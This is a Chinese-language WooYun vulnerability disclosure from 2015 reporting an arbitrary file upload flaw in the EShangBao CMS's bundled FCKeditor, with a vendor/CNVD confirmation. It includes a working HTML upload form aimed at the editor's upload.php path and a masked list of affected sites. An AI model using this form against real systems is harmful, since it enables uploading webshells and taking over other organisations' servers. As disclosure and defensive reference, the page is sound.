当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090835

漏洞标题:某超大型商业CMS任意文件上传导致代码执行(涉及500强、工业、国企、电商、酒店集团、服务业等等领域)

相关厂商:北京易龙天网科技有限公司

漏洞作者: 路人甲

提交时间:2015-01-09 17:55

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-17: 细节向第三方安全合作伙伴开放
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

偶然间去研究后发现了

详细说明:

前人有经验: WooYun: 某超大型商业CMS高危通用SQL注射+Getshell(涉及500强、工业、国企、电商、酒店集团、服务业等等领域) 提交给了Cncert得到很好的修复效果。

test2.jpg


某超大型商业CMS通用任意文件上传导致代码执行
# 涉及500强、工业、国企、电商、酒店集团、服务业等等领域
这套CMS提供商是土豪级的,专为世界500强企业、国家A类大型企业、核工业、电商、高大上酒店行业、服务业、商业等各个领域几千个客户服务
国家电网、中国石化、中国石油、中粮、国机重工、国家核电等全部躺枪
各类电商、七星级酒店、世界500强就不例举了
七星迪曼·易龙天
七星迪曼•易龙天,是一家为大型企业和组织提供互联网全案整合营销服务的专业企业;主要提供网络整合营销咨询、技术解决方案与产品、品牌营销推广、平台运营等服务。
公司成立于 2003 年,总部位于北京,现有员工超过 140 人。现公司下设 七星迪曼传媒 与 易龙天网科技 两家公司,以及一家独立事业平台 七星酒店网 。
七星迪曼•易龙天,与超过 2500 家世界 500 强及高成长性企业深度合作,同时成为 7 家世界 500 强企业纳入优质供应商。

test1.png


更多案例请戳这里,官网展示更加直观

http://www.elongtian.com/kehuanli/

漏洞证明:

CMS为易商宝,其前台存在任意文件上传
因为这个编辑器存在超级严重的问题:

参考链接:http:/


mask 区域


*****5yk*****






/Article/zjbghdzj/62437.htm
Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="





mask 区域


1.http://**.**.**






com/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


案例(google随意抽取的20例)

mask 区域 
1.http://**.**.**/

apply/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**

/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**

/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**

/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**

/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/framework_gb/

Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/fr

amework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/

framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**

/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/framework

_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

mask 区域 
1.http://**.**.**/bln02/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php_
2.http://**.**.**/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php_
3.http://**.**.**/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php_
4.http://**.**.**/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php_
5.http://**.**.**/framework_gb/Web/UI/FCKeditor/editor/filemanager/upload/php/upload.php

</mask>
测试其中的一例:

02.jpg


03.jpg


04.jpg

修复方案:

升级编辑器版本吧,希望CNCERT给个处置报告,也希望该公司继续积极响应修复该高危漏洞!
rank20+

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-01-14 14:29

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无